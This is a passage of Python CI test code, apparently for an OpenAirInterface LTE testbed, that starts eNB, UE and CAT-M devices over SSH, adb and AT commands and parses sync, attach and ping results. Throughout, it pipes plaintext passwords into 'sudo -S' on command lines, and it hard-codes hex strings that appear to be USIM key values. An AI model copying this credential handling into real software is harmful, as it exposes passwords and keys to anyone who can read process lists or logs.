self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --unsafe --name=flexran_rtc_daemon --chdir=/opt/flexran_rtc -o /opt/flexran_rtc/log/flexranctl_' + self.testCase_id + '.log ./my-flexran-ctl.sh', '\$', 5)
self.command('ps -aux | grep --color=never rt_controller', '\$', 5)
result = re.search('rt_controller -c ', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m Initialize FlexRan Controller Completed\u001B[0m')
self.flexranCtrlStarted = True
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeeNB(self):
if self.eNB_serverId == '0':
lIpAddr = self.eNBIPAddress
lUserName = self.eNBUserName
lPassWord = self.eNBPassword
lSourcePath = self.eNBSourceCodePath
elif self.eNB_serverId == '1':
lIpAddr = self.eNB1IPAddress
lUserName = self.eNB1UserName
lPassWord = self.eNB1Password
lSourcePath = self.eNB1SourceCodePath
elif self.eNB_serverId == '2':
lIpAddr = self.eNB2IPAddress
lUserName = self.eNB2UserName
lPassWord = self.eNB2Password
lSourcePath = self.eNB2SourceCodePath
if lIpAddr == '' or lUserName == '' or lPassWord == '' or lSourcePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = False
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_eNB_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
# If the tracer option is on, run tshark on the EPC side and capture traffic between the EPC and the eNB
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('ip addr show | awk -f /tmp/active_net_interfaces.awk | egrep -v "lo|tun"', '\$', 5)
result = re.search('interfaceToUse=(?P<eth_interface>[a-zA-Z0-9\-\_]+)done', str(self.ssh.before))
if result is not None:
eth_interface = result.group('eth_interface')
logging.debug('\u001B[1m Launching tshark on interface ' + eth_interface + '\u001B[0m')
self.EPC_PcapFileName = 'enb_' + self.testCase_id + '_s1log.pcap'
self.command('echo ' + self.EPCPassword + ' | sudo -S rm -f /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.command('echo $USER; nohup sudo tshark -f "host ' + lIpAddr +'" -i ' + eth_interface + ' -w /tmp/' + self.EPC_PcapFileName + ' > /tmp/tshark.log 2>&1 &', self.EPCUserName, 5)
self.close()
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath, '\$', 5)
# Initialize_eNB_args usually starts with -O, followed by the config file location in the repository
full_config_file = self.Initialize_eNB_args.replace('-O ','')
extra_options = ''
extIdx = full_config_file.find('.conf')
if (extIdx > 0):
extra_options = full_config_file[extIdx + 5:]
# if the tracer option is on, compile and run the T Tracer
result = re.search('T_stdout', str(extra_options))
if result is not None:
logging.debug('\u001B[1m Compiling and launching T Tracer\u001B[0m')
self.command('cd common/utils/T/tracer', '\$', 5)
self.command('make', '\$', 10)
self.command('echo $USER; nohup ./record -d ../T_messages.txt -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.raw -ON -off VCD -off HEAVY -off LEGACY_GROUP_TRACE -off LEGACY_GROUP_DEBUG > ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '_record.log 2>&1 &', lUserName, 5)
self.command('cd ' + lSourcePath, '\$', 5)
full_config_file = full_config_file[:extIdx + 5]
config_path, config_file = os.path.split(full_config_file)
else:
sys.exit('Insufficient Parameter')
ci_full_config_file = config_path + '/ci-' + config_file
rruCheck = False
result = re.search('^rru|^rcc|^du.band', str(config_file))
if result is not None:
rruCheck = True
# do not reset board twice in IF4.5 case
result = re.search('^rru|^enb|^du.band', str(config_file))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + lPassWord + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading FPGA bin firmware
self.command('echo ' + lPassWord + ' | sudo -S uhd_find_devices', '\$', 15)
# Make a copy and adapt to EPC / eNB IP addresses
self.command('cp ' + full_config_file + ' ' + ci_full_config_file, '\$', 5)
self.command('sed -i -e \'s/CI_MME_IP_ADDR/' + self.EPCIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_ENB_IP_ADDR/' + lIpAddr + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RCC_IP_ADDR/' + self.eNBIPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU1_IP_ADDR/' + self.eNB1IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
self.command('sed -i -e \'s/CI_RRU2_IP_ADDR/' + self.eNB2IPAddress + '/\' ' + ci_full_config_file, '\$', 2);
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "yes";/\' ' + ci_full_config_file, '\$', 2);
else:
self.command('sed -i -e \'s/FLEXRAN_ENABLED.*;/FLEXRAN_ENABLED = "no";/\' ' + ci_full_config_file, '\$', 2);
self.eNBmbmsEnables[int(self.eNB_instance)] = False
self.command('grep enable_enb_m2 ' + ci_full_config_file, '\$', 2);
result = re.search('yes', str(self.ssh.before))
if result is not None:
self.eNBmbmsEnables[int(self.eNB_instance)] = True
logging.debug('\u001B[1m MBMS is enabled on this eNB\u001B[0m')
result = re.search('noS1', str(self.Initialize_eNB_args))
eNBinNoS1 = False
if result is not None:
eNBinNoS1 = True
logging.debug('\u001B[1m eNB is in noS1 configuration \u001B[0m')
# Launch eNB with the modified config file
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo "ulimit -c unlimited && ./lte_build_oai/build/lte-softmodem -O ' + lSourcePath + '/' + ci_full_config_file + extra_options + '" > ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S rm -Rf enb_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + lPassWord + ' | sudo -S -E daemon --inherit --unsafe --name=enb' + str(self.eNB_instance) + '_daemon --chdir=' + lSourcePath + '/cmake_targets -o ' + lSourcePath + '/cmake_targets/enb_' + self.testCase_id + '.log ./my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.eNBLogFiles[int(self.eNB_instance)] = 'enb_' + self.testCase_id + '.log'
if extra_options != '':
self.eNBOptions[int(self.eNB_instance)] = extra_options
time.sleep(6)
doLoop = True
loopCounter = 10
enbDidSync = False
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# In case of T tracer recording, we may need to kill it
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.command('killall --signal SIGKILL record', '\$', 5)
self.close()
doLoop = False
logging.error('\u001B[1;37;41m eNB log file did not show "got sync"! \u001B[0m')
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'KO', ALL_PROCESSES_OK)
# In case of T tracer recording, we need to kill tshark on EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
if self.EPC_PcapFileName != '':
time.sleep(0.5)
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.close()
time.sleep(1)
if self.EPC_PcapFileName != '':
copyin_res = self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
if (copyin_res == 0):
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.prematureExit = True
return
else:
self.command('stdbuf -o0 cat enb_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Starting"', '\$', 4)
if rruCheck:
result = re.search('wait RUs', str(self.ssh.before))
else:
result = re.search('got sync|Starting F1AP at CU', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
enbDidSync = True
time.sleep(10)
if enbDidSync and eNBinNoS1:
self.command('ifconfig oaitun_enb1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_enb1 interface is mounted and configured\u001B[0m')
else:
logging.error('\u001B[1m oaitun_enb1 interface is either NOT mounted or NOT configured\u001B[0m')
if self.eNBmbmsEnables[int(self.eNB_instance)]:
self.command('ifconfig oaitun_enm1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_enm1 interface is mounted and configured\u001B[0m')
else:
logging.error('\u001B[1m oaitun_enm1 interface is either NOT mounted or NOT configured\u001B[0m')
self.close()
self.CreateHtmlTestRow('-O ' + config_file + extra_options, 'OK', ALL_PROCESSES_OK)
logging.debug('\u001B[1m Initialize eNB Completed\u001B[0m')
def InitializeUE_common(self, device_id, idx):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if not self.ADBCentralized:
# Reboot UE
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesRebootCmd[idx], '\$', 60)
# Wait
time.sleep(60)
# Put in LTE-Mode only
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode1 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode2 11"\'', '\$', 60)
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "settings put global preferred_network_mode3 11"\'', '\$', 60)
# enable data service
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "svc data enable"\'', '\$', 60)
# cycle the radio off/on so that the settings above take effect
# airplane mode off // radio on
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
time.sleep(10)
# airplane mode on // radio off
self.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
self.close()
return
# enable data service
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "svc data enable"', '\$', 60)
# The following commands are deprecated since we no longer work on Android 7+
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell settings put global airplane_mode_on 1', '\$', 10)
# self.command('stdbuf -o0 adb -s ' + device_id + ' shell am broadcast -a android.intent.action.AIRPLANE_MODE --ez state true', '\$', 60)
# A dedicated script has to be installed on the UE:
# turning airplane mode ON means calling /data/local/tmp/off
if device_id == '84B7N16418004022':
self.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
# turning airplane mode OFF means calling /data/local/tmp/on
logging.debug('\u001B[1mUE (' + device_id + ') Initialize Completed\u001B[0m')
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def InitializeUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target = self.InitializeUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def InitializeOAIUE(self):
if self.UEIPAddress == '' or self.UEUserName == '' or self.UEPassword == '' or self.UESourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
# b2xx_fx3_utils reset procedure
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 10)
result = re.search('type: b200', str(self.ssh.before))
if result is not None:
logging.debug('Found a B2xx device --> resetting it')
self.command('echo ' + self.UEPassword + ' | sudo -S b2xx_fx3_utils --reset-device', '\$', 10)
# Reloading the FPGA bin firmware
self.command('echo ' + self.UEPassword + ' | sudo -S uhd_find_devices', '\$', 15)
else:
logging.debug('Did not find any B2xx device')
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets/lte_build_oai/build', '\$', 5)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
# We may have to regenerate the .u* files
if result is None:
self.command('ls /tmp/*.sed', '\$', 5)
result = re.search('adapt_usim_parameters', str(self.ssh.before))
if result is not None:
self.command('sed -f /tmp/adapt_usim_parameters.sed ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
else:
self.command('sed -e "s#93#92#" -e "s#8baf473f2f8fd09487cccbd7097c6862#fec86ba6eb707ed08905757b1bb44b8f#" -e "s#e734f8734007d6c5ce7a0508809e7e9c#C42449363BBAD02B66D16BC975D77CC1#" ../../../openair3/NAS/TOOLS/ue_eurecom_test_sfr.conf > ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf .u*', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S ../../../targets/bin/conf2uedata -c ../../../openair3/NAS/TOOLS/ci-ue_eurecom_test_sfr.conf -o .', '\$', 5)
# Launch UE with the modified config file
self.command('echo "ulimit -c unlimited && ./lte-uesoftmodem ' + self.Initialize_OAI_UE_args + '" > ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.command('chmod 775 ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.UELogFile = 'ue_' + self.testCase_id + '.log'
# Loop several times, hoping the UE really syncs with an eNB
doOuterLoop = True
outerLoopCounter = 5
gotSyncStatus = True
fullSyncStatus = True
while (doOuterLoop):
self.command('cd ' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S -E daemon --inherit --unsafe --name=ue' + str(self.UE_instance) + '_daemon --chdir=' + self.UESourceCodePath + '/cmake_targets/lte_build_oai/build -o ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
time.sleep(6)
self.command('cd ../..', '\$', 5)
doLoop = True
loopCounter = 10
gotSyncStatus = True
# the 'got sync' message indicates the UE threads have synchronized
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# This should never occur
logging.error('"got sync" message never showed!')
gotSyncStatus = False
doLoop = False
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('got sync', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
logging.debug('Found "got sync" message!')
if gotSyncStatus == False:
# we certainly need to stop the lte-uesoftmodem process if it is still running!
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
time.sleep(3)
# Now check whether sync with the eNB did NOT occur:
# during the cell-synchronization stage the UE typically logs a 'No cell synchronization found' message
doLoop = True
loopCounter = 10
while (doLoop):
loopCounter = loopCounter - 1
if (loopCounter == 0):
# At this point the UE most likely achieved cell sync with the eNB
doLoop = False
doOuterLoop = False
fullSyncStatus = True
continue
self.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
result = re.search('No cell synchronization found', str(self.ssh.before))
if result is None:
time.sleep(6)
else:
doLoop = False
fullSyncStatus = False
logging.debug('Found: "No cell synchronization" message! --> try again')
time.sleep(6)
self.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
outerLoopCounter = outerLoopCounter - 1
if (outerLoopCounter == 0):
doOuterLoop = False
if fullSyncStatus and gotSyncStatus:
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is None:
self.command('ifconfig oaitun_ue1', '\$', 4)
# ifconfig output format differs between Ubuntu 16 and Ubuntu 18
result = re.search('inet addr:1|inet 1', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = True
else:
logging.debug(str(self.ssh.before))
logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
if self.eNBmbmsEnables[0]:
self.command('ifconfig oaitun_uem1', '\$', 4)
result = re.search('inet addr', str(self.ssh.before))
if result is not None:
logging.debug('\u001B[1m oaitun_uem1 interface is mounted and configured\u001B[0m')
tunnelInterfaceStatus = tunnelInterfaceStatus and True
else:
logging.error('\u001B[1m oaitun_uem1 interface is either NOT mounted or NOT configured\u001B[0m')
tunnelInterfaceStatus = False
else:
tunnelInterfaceStatus = True
self.close()
if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'OK', ALL_PROCESSES_OK, 'OAI UE')
logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
if (self.ADBIPAddress != 'none'):
self.UEDevices = []
self.UEDevices.append('OAI-UE')
self.UEDevicesStatus = []
self.UEDevicesStatus.append(UE_STATUS_DETACHED)
else:
if self.eNBmbmsEnables[0]:
self.htmlUEFailureMsg = 'oaitun_ue1/oaitun_uem1 interfaces are either NOT mounted or NOT configured'
else:
self.htmlUEFailureMsg = 'oaitun_ue1 interface is either NOT mounted or NOT configured'
self.CreateHtmlTestRow(self.Initialize_OAI_UE_args, 'KO', OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
self.AutoTerminateUEandeNB()
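# Poll 'lsof' up to 5 times (5 s apart) until picocom no longer holds /dev/ttyUSB0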
def checkDevTTYisUnlocked(self):
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
count = 0
while count < 5:
self.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
result = re.search('picocom', str(self.ssh.before))
if result is None:
count = 10
else:
time.sleep(5)
count = count + 1
self.close()
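# Initialize the CAT-M module through a picocom serial session (921600 baud on /dev/ttyUSB0):
# reset the module, disable the radio (AT+CFUN=0) and make sure auto-attach (AT^AUTOATT) is enabled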
def InitializeCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# Dummy call to start a sudo session; the picocom command does NOT handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Call AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Doing a power cycle
self.command('AT^RESET', 'SIMSTORE,READY', 15)
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
self.command('ATE1', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
# Checking if auto-attach is enabled
self.command('AT^AUTOATT?', 'OK', 5)
result = re.search('AUTOATT: (?P<state>[0-9\-]+)', str(self.ssh.before))
if result is not None:
if result.group('state') is not None:
autoAttachState = int(result.group('state'))
if autoAttachState is not None:
if autoAttachState == 0:
self.command('AT^AUTOATT=1', 'OK', 5)
logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
# Force picocom to close; the device might still be locked
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# Dummy call to start a sudo session; the picocom command does NOT handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Call AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Disabling the Radio
self.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
self.close()
self.picocom_closure = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
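# Attach the CAT-M module: enable the radio (AT+CFUN=1), poll AT+CEREG until the
# registration state reaches 1 (registered), then read AT+CESQ for signal quality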
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.picocom_closure = True
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# Dummy call to start a sudo session; the picocom command does NOT handle `sudo -S` well
self.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
self.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Call AT twice to clear all buffers
self.command('AT', 'OK|ERROR', 5)
self.command('AT', 'OK', 5)
# Enabling the Radio
self.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# Check whether the module registers with the network
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
self.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', str(self.ssh.before))
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', str(self.ssh.before))
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(str(self.ssh.before))
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
# Initialize first, so the HTML report below cannot hit undefined names if CESQ parsing fails
nRSRQ = None
nRSRP = None
self.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', str(self.ssh.before))
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
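# AT+CESQ reported values map approximately to physical units (see 3GPP TS 27.007):
# RSRQ_dB ~= value/2 - 20, RSRP_dBm ~= value - 140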
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
self.close()
self.picocom_closure = False
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module Attachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
logging.error('\u001B[1m CAT-M module Attachment Failed\u001B[0m')
html_cell = '<pre style="background-color:white">CAT-M module Attachment Failed</pre>'
html_queue.put(html_cell)
self.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
self.AutoTerminateUEandeNB()
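# Ping the CAT-M module from the EPC: recover its IP address from the xGw log
# (ltebox only; the OAI HSS path is not implemented), then parse packet-loss and RTT stats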
def PingCatM(self):
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '' or self.EPCSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
try:
statusQueue = SimpleQueue()
lock = Lock()
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
logging.debug('Using the OAI EPC HSS: not implemented yet')
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.CreateHtmlTabFooter(False)
sys.exit(1)
else:
self.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', str(self.ssh.before))
if result is not None:
moduleIPAddr = result.group('ipaddr')
else:
self.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
ping_time = re.findall("-c (\d+)",str(self.ping_args))
device_id = 'catm'
ping_status = self.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
# TIMEOUT CASE
if ping_status < 0:
message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', str(self.ssh.before))
if result is None:
message = 'Packet Loss Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
packetloss = result.group('packetloss')
if float(packetloss) == 100:
message = 'Packet Loss is 100%'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', str(self.ssh.before))
if result is None:
message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
self.close()
self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
return
rtt_min = result.group('rtt_min')
rtt_avg = result.group('rtt_avg')
rtt_max = result.group('rtt_max')
pal_msg = 'Packet Loss : ' + packetloss + '%'
min_msg = 'RTT(Min) : ' + rtt_min + ' ms'
avg_msg = 'RTT(Avg) : ' + rtt_avg + ' ms'
max_msg = 'RTT(Max) : ' + rtt_max + ' ms'
lock.acquire()
logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
logging.debug('\u001B[1;34m ' + pal_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + min_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + avg_msg + '\u001B[0m')
logging.debug('\u001B[1;34m ' + max_msg + '\u001B[0m')
qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
packetLossOK = True
